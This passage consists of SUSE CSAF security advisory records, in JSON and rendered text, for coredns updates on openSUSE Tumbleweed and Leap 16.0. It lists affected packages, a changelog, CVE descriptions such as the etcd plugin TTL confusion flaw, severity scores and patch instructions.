"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-1.12.4-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-1.12.4-2.1.aarch64"
},
"product_reference": "coredns-1.12.4-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-1.12.4-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-1.12.4-2.1.ppc64le"
},
"product_reference": "coredns-1.12.4-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-1.12.4-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-1.12.4-2.1.s390x"
},
"product_reference": "coredns-1.12.4-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-1.12.4-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-1.12.4-2.1.x86_64"
},
"product_reference": "coredns-1.12.4-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-extras-1.12.4-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.aarch64"
},
"product_reference": "coredns-extras-1.12.4-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-extras-1.12.4-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.ppc64le"
},
"product_reference": "coredns-extras-1.12.4-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-extras-1.12.4-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.s390x"
},
"product_reference": "coredns-extras-1.12.4-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-extras-1.12.4-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.x86_64"
},
"product_reference": "coredns-extras-1.12.4-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-58063",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58063"
}
],
"notes": [
{
"category": "general",
"text": "CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:coredns-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.x86_64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58063",
"url": "https://www.suse.com/security/cve/CVE-2025-58063"
},
{
"category": "external",
"summary": "SUSE Bug 1249389 for CVE-2025-58063",
"url": "https://bugzilla.suse.com/1249389"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:coredns-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.x86_64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:coredns-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.x86_64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-58063"
}
]
}
OPENSUSE-SU-2026:20099-1
Vulnerability from csaf_opensuse - Published: 2026-01-24 09:09 - Updated: 2026-01-24 09:09Summary
Security update for coredns
Notes
Title of the patch
Security update for coredns
Description of the patch
This update for coredns fixes the following issues:
Changes in coredns:
- fix CVE-2025-68156 bsc#1255345
- fix CVE-2025-68161 bsc#1256411
- Update to version 1.14.0:
* core: Fix gosec G115 integer overflow warnings
* core: Add regex length limit
* plugin/azure: Fix slice init length
* plugin/errors: Add optional show_first flag to consolidate directive
* plugin/file: Fix for misleading SOA parser warnings
* plugin/kubernetes: Rate limits to api server
* plugin/metrics: Implement plugin chain tracking
* plugin/sign: Report parser err before missing SOA
* build(deps): bump github.com/expr-lang/expr from 1.17.6 to 1.17.7
- Update to version 1.13.2:
* core: Add basic support for DoH3
* core: Avoid proxy unnecessary alloc in Yield
* core: Fix usage of sync.Pool to save an alloc
* core: Fix data race with sync.RWMutex for uniq
* core: Prevent QUIC reload panic by lazily initializing the listener
* core: Refactor/use reflect.TypeFor
* plugin/auto: Limit regex length
* plugin/cache: Remove superfluous allocations in item.toMsg
* plugin/cache: Isolate metadata in prefetch goroutine
* plugin/cache: Correct spelling of MaximumDefaultTTL in cache and dnsutil
packages
* plugin/dnstap: Better error handling (redial & logging) when Dnstap is busy
* plugin/file: Performance finetuning
* plugin/forward: Disallow NOERROR in failover
* plugin/forward: Added support for per-nameserver TLS SNI
* plugin/forward: Prevent busy loop on connection err
* plugin/forward: Add max connect attempts knob
* plugin/geoip: Add ASN schema support
* plugin/geoip: Add support for subdivisions
* plugin/kubernetes: Fix kubernetes plugin logging
* plugin/multisocket: Cap num sockets to prevent OOM
* plugin/nomad: Support service filtering
* plugin/rewrite: Pre-compile CNAME rewrite regexp
* plugin/secondary: Fix reload causing secondary plugin goroutine to leak
- Update to version 1.13.1:
* core: Avoid string concatenation in loops
* core: Update golang to 1.25.2 and golang.org/x/net to v0.45.0 on CVE fixes
* plugin/sign: Reject invalid UTF‑8 dbfile token
- Update to version 1.13.0:
* core: Export timeout values in dnsserver.Server
* core: Fix Corefile infinite loop on unclosed braces
* core: Fix Corefile related import cycle issue
* core: Normalize panics on invalid origins
* core: Rely on dns.Server.ShutdownContext to gracefully stop
* plugin/dnstap: Add bounds for plugin args
* plugin/file: Fix data race in tree Elem.Name
* plugin/forward: No failover to next upstream when receiving SERVFAIL or
REFUSED response codes
* plugin/grpc: Enforce DNS message size limits
* plugin/loop: Prevent panic when ListenHosts is empty
* plugin/loop: Avoid panic on invalid server block
* plugin/nomad: Add a Nomad plugin
* plugin/reload: Prevent SIGTERM/reload deadlock
- fix CVE-2025-58063 bsc#1249389
- Update to version 1.12.4:
* bump deps
* fix(transfer): goroutine leak on axfr err (#7516)
* plugin/etcd: fix import order for ttl test (#7515)
* fix(grpc): check proxy list length in policies (#7512)
* fix(https): propagate HTTP request context (#7491)
* fix(plugin): guard nil lookups across plugins (#7494)
* lint: add missing prealloc to backend lookup test (#7510)
* fix(grpc): span leak on error attempt (#7487)
* test(plugin): improve backend lookup coverage (#7496)
* lint: enable prealloc (#7493)
* lint: enable durationcheck (#7492)
* Add Sophotech to adopters list (#7495)
* plugin: Use %w to wrap user error (#7489)
* fix(metrics): add timeouts to metrics HTTP server (#7469)
* chore(ci): restrict token permissions (#7470)
* chore(ci): pin workflow dependencies (#7471)
* fix(forward): use netip package for parsing (#7472)
* test(plugin): improve test coverage for pprof (#7473)
* build(deps): bump github.com/go-viper/mapstructure/v2 (#7468)
* plugin/file: fix label offset problem in ClosestEncloser (#7465)
* feat(trace): migrate dd-trace-go v1 to v2 (#7466)
* test(multisocket): deflake restart by using a fresh port and coordinated cleanup (#7438)
* chore: update Go version to 1.24.6 (#7437)
* plugin/header: Remove deprecated syntax (#7436)
* plugin/loadbalance: support prefer option (#7433)
* Improve caddy.GracefulServer conformance checks (#7416)
- Update to version 1.12.3:
* chore: Minor changes to `Dockerfile` (#7428)
* Properly create hostname from IPv6 (#7431)
* Bump deps
* fix: handle cached connection closure in forward plugin (#7427)
* plugin/test: fix TXT record comparison for multi-chunk vs multiple records
* plugin/file: preserve case in SRV record names and targets per RFC 6763
* fix(auto/file): return REFUSED when no next plugin is available (#7381)
* Port to AWS Go SDK v2 (#6588)
* fix(cache): data race when refreshing cached messages (#7398)
* fix(cache): data race when updating the TTL of cached messages (#7397)
* chore: fix docs incompatibility (#7390)
* plugin/rewrite: Add EDNS0 Unset Action (#7380)
* add args: startup_timeout for kubernetes plugin (#7068)
* [plugin/cache] create a copy of a response to ensure original data is never
modified
* Add support for fallthrough to the grpc plugin (#7359)
* view: Add IPv6 example match (#7355)
* chore: enable more rules from revive (#7352)
* chore: enable early-return and superfluous-else from revive (#7129)
* test(plugin): improve tests for auto (#7348)
* fix(proxy): flaky dial tests (#7349)
* test: add t.Helper() calls to test helper functions (#7351)
* fix(kubernetes): multicluster DNS race condition (#7350)
* lint: enable wastedassign linter (#7340)
* test(plugin): add tests for any (#7341)
* Actually invoke make release -f Makefile.release during test (#7338)
* Keep golang to 1.24.2 due to build issues in 1.24.3 (#7337)
* lint: enable protogetter linter (#7336)
* lint: enable nolintlint linter (#7332)
* fix: missing intrange lint fix (#7333)
* perf(kubernetes): optimize AutoPath slice allocation (#7323)
* lint: enable intrange linter (#7331)
* feat(plugin/file): fallthrough (#7327)
* lint: enable canonicalheader linter (#7330)
* fix(proxy): avoid Dial hang after Transport stopped (#7321)
* test(plugin): add tests for pkg/rand (#7320)
* test(dnsserver): add unit tests for gRPC and QUIC servers (#7319)
* fix: loop variable capture and linter (#7328)
* lint: enable usetesting linter (#7322)
* test: skip certain network-specific tests on non-Linux (#7318)
* test(dnsserver): improve core/dnsserver test coverage (#7317)
* fix(metrics): preserve request size from plugins (#7313)
* fix: ensure DNS query name reset in plugin.NS error path (#7142)
* feat: enable plugins via environment during build (#7310)
* fix(plugin/bind): remove zone for link-local IPv4 (#7295)
* test(request): improve coverage across package (#7307)
* test(coremain): Add unit tests (#7308)
* ci(test-e2e): add Go version setup to workflow (#7309)
* kubernetes: add multicluster support (#7266)
* chore: Add new maintainer thevilledev (#7298)
* Update golangci-lint (#7294)
* feat: limit concurrent DoQ streams and goroutines (#7296)
* docs: add man page for multisocket plugin (#7297)
* Prepare for the k8s api upgrade (#7293)
* fix(rewrite): truncated upstream response (#7277)
* fix(plugin/secondary): make transfer property mandatory (#7249)
* plugin/bind: remove macOS bug mention in docs (#7250)
* Remove `?bla=foo:443` for `POST` DoH (#7257)
* Do not interrupt querying readiness probes for plugins (#6975)
* Added `SetProxyOptions` function for `forward` plugin (#7229)
- Backported quic-go PR #5094: Fix parsing of ifindex from packets
to ensure compatibility with big-endian architectures
(see quic-go/quic-go#4978, coredns/coredns#6682).
- Update to version 1.12.1:
* core: Increase CNAME lookup limit from 7 to 10 (#7153)
* plugin/kubernetes: Fix handling of pods having DeletionTimestamp set
* plugin/kubernetes: Revert "only create PTR records for endpoints with
hostname defined"
* plugin/forward: added option failfast_all_unhealthy_upstreams to return
servfail if all upstreams are down
* bump dependencies, fixing bsc#1239294 and bsc#1239728
- Update to version 1.12.0:
* New multisocket plugin - allows CoreDNS to listen on multiple sockets
* bump deps
- Update to version 1.11.4:
* forward plugin: new option next, to try alternate upstreams when receiving
specified response codes upstreams on (functions like the external plugin
alternate)
* dnssec plugin: new option to load keys from AWS Secrets Manager
* rewrite plugin: new option to revert EDNS0 option rewrites in responses
- Update to version 1.11.3+git129.387f34d:
* fix CVE-2024-51744 (https://bugzilla.suse.com/show_bug.cgi?id=1232991)
build(deps): bump github.com/golang-jwt/jwt/v4 from 4.5.0 to 4.5.1 (#6955)
* core: set cache-control max-age as integer, not float (#6764)
* Issue-6671: Fixed the order of plugins. (#6729)
* `root`: explicit mark `dnssec` support (#6753)
* feat: dnssec load keys from AWS Secrets Manager (#6618)
* fuzzing: fix broken oss-fuzz build (#6880)
* Replace k8s.io/utils/strings/slices by Go stdlib slices (#6863)
* Update .go-version to 1.23.2 (#6920)
* plugin/rewrite: Add "revert" parameter for EDNS0 options (#6893)
* Added OpenSSF Scorecard Badge (#6738)
* fix(cwd): Restored backwards compatibility of Current Workdir (#6731)
* fix: plugin/auto: call OnShutdown() for each zone at its own OnShutdown() (#6705)
* feature: log queue and buffer memory size configuration (#6591)
* plugin/bind: add zone for link-local IPv6 instead of skipping (#6547)
* only create PTR records for endpoints with hostname defined (#6898)
* fix: reverter should execute the reversion in reversed order (#6872)
* plugin/etcd: fix etcd connection leakage when reload (#6646)
* kubernetes: Add useragent (#6484)
* Update build (#6836)
* Update grpc library use (#6826)
* Bump go version from 1.21.11 to 1.21.12 (#6800)
* Upgrade antonmedv/expr to expr-lang/expr (#6814)
* hosts: add hostsfile as label for coredns_hosts_entries (#6801)
* fix TestCorefile1 panic for nil handling (#6802)
Patchnames
openSUSE-Leap-16.0-packagehub-87
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for coredns",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for coredns fixes the following issues:\n\nChanges in coredns:\n\n- fix CVE-2025-68156 bsc#1255345\n- fix CVE-2025-68161 bsc#1256411\n- Update to version 1.14.0:\n * core: Fix gosec G115 integer overflow warnings\n * core: Add regex length limit\n * plugin/azure: Fix slice init length\n * plugin/errors: Add optional show_first flag to consolidate directive\n * plugin/file: Fix for misleading SOA parser warnings\n * plugin/kubernetes: Rate limits to api server\n * plugin/metrics: Implement plugin chain tracking\n * plugin/sign: Report parser err before missing SOA\n * build(deps): bump github.com/expr-lang/expr from 1.17.6 to 1.17.7\n\n- Update to version 1.13.2:\n * core: Add basic support for DoH3\n * core: Avoid proxy unnecessary alloc in Yield\n * core: Fix usage of sync.Pool to save an alloc\n * core: Fix data race with sync.RWMutex for uniq\n * core: Prevent QUIC reload panic by lazily initializing the listener\n * core: Refactor/use reflect.TypeFor\n * plugin/auto: Limit regex length\n * plugin/cache: Remove superfluous allocations in item.toMsg\n * plugin/cache: Isolate metadata in prefetch goroutine\n * plugin/cache: Correct spelling of MaximumDefaultTTL in cache and dnsutil\n packages\n * plugin/dnstap: Better error handling (redial \u0026 logging) when Dnstap is busy\n * plugin/file: Performance finetuning\n * plugin/forward: Disallow NOERROR in failover\n * plugin/forward: Added support for per-nameserver TLS SNI\n * plugin/forward: Prevent busy loop on connection err\n * plugin/forward: Add max connect attempts knob\n * plugin/geoip: Add ASN schema support\n * plugin/geoip: Add support for subdivisions\n * plugin/kubernetes: Fix kubernetes plugin logging\n * plugin/multisocket: Cap num sockets to prevent OOM\n * plugin/nomad: Support service filtering\n * plugin/rewrite: Pre-compile CNAME rewrite regexp\n * plugin/secondary: Fix reload causing secondary plugin goroutine to leak\n\n- Update to version 1.13.1:\n * core: Avoid string concatenation in loops\n * core: Update golang to 1.25.2 and golang.org/x/net to v0.45.0 on CVE fixes\n * plugin/sign: Reject invalid UTF\u20118 dbfile token\n\n- Update to version 1.13.0:\n * core: Export timeout values in dnsserver.Server\n * core: Fix Corefile infinite loop on unclosed braces\n * core: Fix Corefile related import cycle issue\n * core: Normalize panics on invalid origins\n * core: Rely on dns.Server.ShutdownContext to gracefully stop\n * plugin/dnstap: Add bounds for plugin args\n * plugin/file: Fix data race in tree Elem.Name\n * plugin/forward: No failover to next upstream when receiving SERVFAIL or\n REFUSED response codes\n * plugin/grpc: Enforce DNS message size limits\n * plugin/loop: Prevent panic when ListenHosts is empty\n * plugin/loop: Avoid panic on invalid server block\n * plugin/nomad: Add a Nomad plugin\n * plugin/reload: Prevent SIGTERM/reload deadlock\n\n- fix CVE-2025-58063 bsc#1249389\n- Update to version 1.12.4:\n * bump deps\n * fix(transfer): goroutine leak on axfr err (#7516)\n * plugin/etcd: fix import order for ttl test (#7515)\n * fix(grpc): check proxy list length in policies (#7512)\n * fix(https): propagate HTTP request context (#7491)\n * fix(plugin): guard nil lookups across plugins (#7494)\n * lint: add missing prealloc to backend lookup test (#7510)\n * fix(grpc): span leak on error attempt (#7487)\n * test(plugin): improve backend lookup coverage (#7496)\n * lint: enable prealloc (#7493)\n * lint: enable durationcheck (#7492)\n * Add Sophotech to adopters list (#7495)\n * plugin: Use %w to wrap user error (#7489)\n * fix(metrics): add timeouts to metrics HTTP server (#7469)\n * chore(ci): restrict token permissions (#7470)\n * chore(ci): pin workflow dependencies (#7471)\n * fix(forward): use netip package for parsing (#7472)\n * test(plugin): improve test coverage for pprof (#7473)\n * build(deps): bump github.com/go-viper/mapstructure/v2 (#7468)\n * plugin/file: fix label offset problem in ClosestEncloser (#7465)\n * feat(trace): migrate dd-trace-go v1 to v2 (#7466)\n * test(multisocket): deflake restart by using a fresh port and coordinated cleanup (#7438)\n * chore: update Go version to 1.24.6 (#7437)\n * plugin/header: Remove deprecated syntax (#7436)\n * plugin/loadbalance: support prefer option (#7433)\n * Improve caddy.GracefulServer conformance checks (#7416)\n\n- Update to version 1.12.3:\n * chore: Minor changes to `Dockerfile` (#7428)\n * Properly create hostname from IPv6 (#7431)\n * Bump deps\n * fix: handle cached connection closure in forward plugin (#7427)\n * plugin/test: fix TXT record comparison for multi-chunk vs multiple records\n * plugin/file: preserve case in SRV record names and targets per RFC 6763\n * fix(auto/file): return REFUSED when no next plugin is available (#7381)\n * Port to AWS Go SDK v2 (#6588)\n * fix(cache): data race when refreshing cached messages (#7398)\n * fix(cache): data race when updating the TTL of cached messages (#7397)\n * chore: fix docs incompatibility (#7390)\n * plugin/rewrite: Add EDNS0 Unset Action (#7380)\n * add args: startup_timeout for kubernetes plugin (#7068)\n * [plugin/cache] create a copy of a response to ensure original data is never\n modified\n * Add support for fallthrough to the grpc plugin (#7359)\n * view: Add IPv6 example match (#7355)\n * chore: enable more rules from revive (#7352)\n * chore: enable early-return and superfluous-else from revive (#7129)\n * test(plugin): improve tests for auto (#7348)\n * fix(proxy): flaky dial tests (#7349)\n * test: add t.Helper() calls to test helper functions (#7351)\n * fix(kubernetes): multicluster DNS race condition (#7350)\n * lint: enable wastedassign linter (#7340)\n * test(plugin): add tests for any (#7341)\n * Actually invoke make release -f Makefile.release during test (#7338)\n * Keep golang to 1.24.2 due to build issues in 1.24.3 (#7337)\n * lint: enable protogetter linter (#7336)\n * lint: enable nolintlint linter (#7332)\n * fix: missing intrange lint fix (#7333)\n * perf(kubernetes): optimize AutoPath slice allocation (#7323)\n * lint: enable intrange linter (#7331)\n * feat(plugin/file): fallthrough (#7327)\n * lint: enable canonicalheader linter (#7330)\n * fix(proxy): avoid Dial hang after Transport stopped (#7321)\n * test(plugin): add tests for pkg/rand (#7320)\n * test(dnsserver): add unit tests for gRPC and QUIC servers (#7319)\n * fix: loop variable capture and linter (#7328)\n * lint: enable usetesting linter (#7322)\n * test: skip certain network-specific tests on non-Linux (#7318)\n * test(dnsserver): improve core/dnsserver test coverage (#7317)\n * fix(metrics): preserve request size from plugins (#7313)\n * fix: ensure DNS query name reset in plugin.NS error path (#7142)\n * feat: enable plugins via environment during build (#7310)\n * fix(plugin/bind): remove zone for link-local IPv4 (#7295)\n * test(request): improve coverage across package (#7307)\n * test(coremain): Add unit tests (#7308)\n * ci(test-e2e): add Go version setup to workflow (#7309)\n * kubernetes: add multicluster support (#7266)\n * chore: Add new maintainer thevilledev (#7298)\n * Update golangci-lint (#7294)\n * feat: limit concurrent DoQ streams and goroutines (#7296)\n * docs: add man page for multisocket plugin (#7297)\n * Prepare for the k8s api upgrade (#7293)\n * fix(rewrite): truncated upstream response (#7277)\n * fix(plugin/secondary): make transfer property mandatory (#7249)\n * plugin/bind: remove macOS bug mention in docs (#7250)\n * Remove `?bla=foo:443` for `POST` DoH (#7257)\n * Do not interrupt querying readiness probes for plugins (#6975)\n * Added `SetProxyOptions` function for `forward` plugin (#7229)\n\n- Backported quic-go PR #5094: Fix parsing of ifindex from packets\n to ensure compatibility with big-endian architectures\n (see quic-go/quic-go#4978, coredns/coredns#6682).\n\n- Update to version 1.12.1:\n * core: Increase CNAME lookup limit from 7 to 10 (#7153)\n * plugin/kubernetes: Fix handling of pods having DeletionTimestamp set\n * plugin/kubernetes: Revert \"only create PTR records for endpoints with\n hostname defined\"\n * plugin/forward: added option failfast_all_unhealthy_upstreams to return\n servfail if all upstreams are down\n * bump dependencies, fixing bsc#1239294 and bsc#1239728\n\n- Update to version 1.12.0:\n * New multisocket plugin - allows CoreDNS to listen on multiple sockets\n * bump deps\n\n- Update to version 1.11.4:\n * forward plugin: new option next, to try alternate upstreams when receiving\n specified response codes upstreams on (functions like the external plugin\n alternate)\n * dnssec plugin: new option to load keys from AWS Secrets Manager\n * rewrite plugin: new option to revert EDNS0 option rewrites in responses\n\n- Update to version 1.11.3+git129.387f34d:\n * fix CVE-2024-51744 (https://bugzilla.suse.com/show_bug.cgi?id=1232991)\n build(deps): bump github.com/golang-jwt/jwt/v4 from 4.5.0 to 4.5.1 (#6955)\n * core: set cache-control max-age as integer, not float (#6764)\n * Issue-6671: Fixed the order of plugins. (#6729)\n * `root`: explicit mark `dnssec` support (#6753)\n * feat: dnssec load keys from AWS Secrets Manager (#6618)\n * fuzzing: fix broken oss-fuzz build (#6880)\n * Replace k8s.io/utils/strings/slices by Go stdlib slices (#6863)\n * Update .go-version to 1.23.2 (#6920)\n * plugin/rewrite: Add \"revert\" parameter for EDNS0 options (#6893)\n * Added OpenSSF Scorecard Badge (#6738)\n * fix(cwd): Restored backwards compatibility of Current Workdir (#6731)\n * fix: plugin/auto: call OnShutdown() for each zone at its own OnShutdown() (#6705)\n * feature: log queue and buffer memory size configuration (#6591)\n * plugin/bind: add zone for link-local IPv6 instead of skipping (#6547)\n * only create PTR records for endpoints with hostname defined (#6898)\n * fix: reverter should execute the reversion in reversed order (#6872)\n * plugin/etcd: fix etcd connection leakage when reload (#6646)\n * kubernetes: Add useragent (#6484)\n * Update build (#6836)\n * Update grpc library use (#6826)\n * Bump go version from 1.21.11 to 1.21.12 (#6800)\n * Upgrade antonmedv/expr to expr-lang/expr (#6814)\n * hosts: add hostsfile as label for coredns_hosts_entries (#6801)\n * fix TestCorefile1 panic for nil handling (#6802)\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Leap-16.0-packagehub-87",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_20099-1.json"
},
{
"category": "self",
"summary": "SUSE Bug 1239294",
"url": "https://bugzilla.suse.com/1239294"
},
{
"category": "self",
"summary": "SUSE Bug 1239728",
"url": "https://bugzilla.suse.com/1239728"
},
{
"category": "self",
"summary": "SUSE Bug 1249389",
"url": "https://bugzilla.suse.com/1249389"
},
{
"category": "self",
"summary": "SUSE Bug 1255345",
"url": "https://bugzilla.suse.com/1255345"
},
{
"category": "self",
"summary": "SUSE Bug 1256411",
"url": "https://bugzilla.suse.com/1256411"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-51744 page",
"url": "https://www.suse.com/security/cve/CVE-2024-51744/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58063 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58063/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68156 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68161 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68161/"
}
],
"title": "Security update for coredns",
"tracking": {
"current_release_date": "2026-01-24T09:09:32Z",
"generator": {
"date": "2026-01-24T09:09:32Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:20099-1",
"initial_release_date": "2026-01-24T09:09:32Z",
"revision_history": [
{
"date": "2026-01-24T09:09:32Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "coredns-1.14.0-bp160.1.1.aarch64",
"product": {
"name": "coredns-1.14.0-bp160.1.1.aarch64",
"product_id": "coredns-1.14.0-bp160.1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "coredns-extras-1.14.0-bp160.1.1.noarch",
"product": {
"name": "coredns-extras-1.14.0-bp160.1.1.noarch",
"product_id": "coredns-extras-1.14.0-bp160.1.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "coredns-1.14.0-bp160.1.1.ppc64le",
"product": {
"name": "coredns-1.14.0-bp160.1.1.ppc64le",
"product_id": "coredns-1.14.0-bp160.1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "coredns-1.14.0-bp160.1.1.x86_64",
"product": {
"name": "coredns-1.14.0-bp160.1.1.x86_64",
"product_id": "coredns-1.14.0-bp160.1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Leap 16.0",
"product": {
"name": "openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0"
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-1.14.0-bp160.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.aarch64"
},
"product_reference": "coredns-1.14.0-bp160.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-1.14.0-bp160.1.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.ppc64le"
},
"product_reference": "coredns-1.14.0-bp160.1.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-1.14.0-bp160.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:coredns-1.14.0-bp160.1.1.x86_64"
},
"product_reference": "coredns-1.14.0-bp160.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-extras-1.14.0-bp160.1.1.noarch as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:coredns-extras-1.14.0-bp160.1.1.noarch"
},
"product_reference": "coredns-extras-1.14.0-bp160.1.1.noarch",
"relates_to_product_reference": "openSUSE Leap 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-51744",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-51744"
}
],
"notes": [
{
"category": "general",
